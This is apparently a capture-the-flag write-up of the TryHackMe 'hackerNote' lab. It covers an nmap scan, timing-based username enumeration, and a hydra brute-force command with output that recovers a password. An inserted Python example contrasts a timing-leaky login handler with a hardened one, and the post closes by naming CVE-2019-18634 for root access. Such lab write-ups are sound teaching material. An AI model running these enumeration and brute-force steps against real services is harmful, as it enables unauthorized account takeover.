WriteUp — THM hackerNote

Jari Laurila
3 min read · Oct 17, 2020

A custom webapp, introducing username enumeration, custom wordlists and a basic privilege escalation exploit.

This is a writeup for TryHackMe room hackerNote.


Reconnaissance

Start with NMAP scan:

nmap -sC -sV -p- 10.10.31.138
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-17 13:56 EEST
Nmap scan report for 10.10.31.138
Host is up (0.053s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 10:a6:95:34:62:b0:56:2a:38:15:77:58:f4:f3:6c:ac (RSA)
| 256 6f:18:27:a4:e7:21:9d:4e:6d:55:b3:ac:c5:2d:d5:d3 (ECDSA)
|_ 256 2d:c3:1b:58:4d:c3:5d:8e:6a:f6:37:9d:ca:ad:20:7c (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Home — hackerNote
8080/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Home — hackerNote
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Three open ports, SSH and a custom web app. Let’s take a look.

Investigate

Register a user account with the dummy values a,1,a. Then try logging in with valid and invalid credentials and usernames. I notice that logging in with a valid username but a wrong password takes considerably longer than logging in with an invalid username.

Exploit

Let’s use a timing attack to enumerate usernames. As a dictionary I pick malenames-usa-top1000.txt from SecLists:

And craft a Python program to do the attack:

Based on running this script, james is a valid username.
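The timing gap that makes this enumeration work comes from a login handler that only runs the slow password hash when the username exists. As an added illustration (not the room’s code or the author’s script), here is a constructed vulnerable handler beside a hardened one that always hashes against a dummy record; a call counter on the hash function shows that the hardened version does the same work whether or not the user exists:

```python
import hashlib
import hmac
import time

# Constructed demo user store and parameters; not the real hackerNote backend.
SALT = b"demo-salt"
ROUNDS = 100_000          # deliberately slow, like a real password hash
HASH_CALLS = 0            # counts expensive hash operations for the demo


def _hash(password: str) -> bytes:
    global HASH_CALLS
    HASH_CALLS += 1
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, ROUNDS)


USERS = {"james": _hash("correct horse")}      # constructed sample account
DUMMY_HASH = _hash("placeholder")              # compared against for unknown users


def login_vulnerable(username: str, password: str) -> bool:
    """Unknown users return before hashing, so they fail much faster than known ones."""
    stored = USERS.get(username)
    if stored is None:
        return False                           # fast path leaks username validity
    return hmac.compare_digest(_hash(password), stored)


def login_hardened(username: str, password: str) -> bool:
    """Always performs the expensive hash, so timing does not depend on user existence."""
    stored = USERS.get(username, DUMMY_HASH)
    ok = hmac.compare_digest(_hash(password), stored)
    return ok and username in USERS            # never accept a match on the dummy


def hash_work(login_fn, username: str, password: str) -> int:
    """Number of hash computations one login attempt triggers."""
    global HASH_CALLS
    HASH_CALLS = 0
    login_fn(username, password)
    return HASH_CALLS


def time_login(login_fn, username: str, password: str, samples: int = 3) -> float:
    """Best-of-N wall-clock time for one attempt, as an attacker would measure it."""
    return min(_timed(login_fn, username, password) for _ in range(samples))


def _timed(login_fn, username: str, password: str) -> float:
    t0 = time.perf_counter()
    login_fn(username, password)
    return time.perf_counter() - t0


if __name__ == "__main__":
    for fn in (login_vulnerable, login_hardened):
        known = time_login(fn, "james", "wrong")
        unknown = time_login(fn, "nobody", "wrong")
        print(f"{fn.__name__}: known={known:.3f}s unknown={unknown:.3f}s")
```

Running the block shows a large known/unknown gap for the vulnerable handler and none for the hardened one, which is the property to check when reviewing a login endpoint for this class of enumeration.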

Attack Passwords

Let’s start by obtaining a password hint from the web application:

Using the files provided with the hint, let’s combine them into a word list for the attack:

/usr/lib/hashcat-utils/combinator.bin colors.txt numbers.txt > attacklist.txt

Feed the list to hydra:

hydra -l james -P attacklist.txt 10.10.31.138 http-post-form '/api/user/login:username=^USER^&password=^PASS^:Invalid'
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-17 15:05:46
[DATA] max 16 tasks per 1 server, overall 16 tasks, 180 login tries (l:1/p:180), ~12 tries per task
[DATA] attacking http-post-form://10.10.31.138:80/api/user/login:username=^USER^&password=^PASS^:Invalid
[STATUS] 48.00 tries/min, 48 tries in 00:01h, 132 to do in 00:03h, 16 active
[80][http-post-form] host: 10.10.31.138 login: james password: __REDACTED__
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-17 15:07:02

Log in as james and retrieve the SSH password from his notes. Log in to the server over SSH and retrieve the user flag.

Escalate

Based on the room’s instructions, the box is vulnerable to CVE-2019-18634. Get the exploit, compile it and run it on the box to get the root flag.
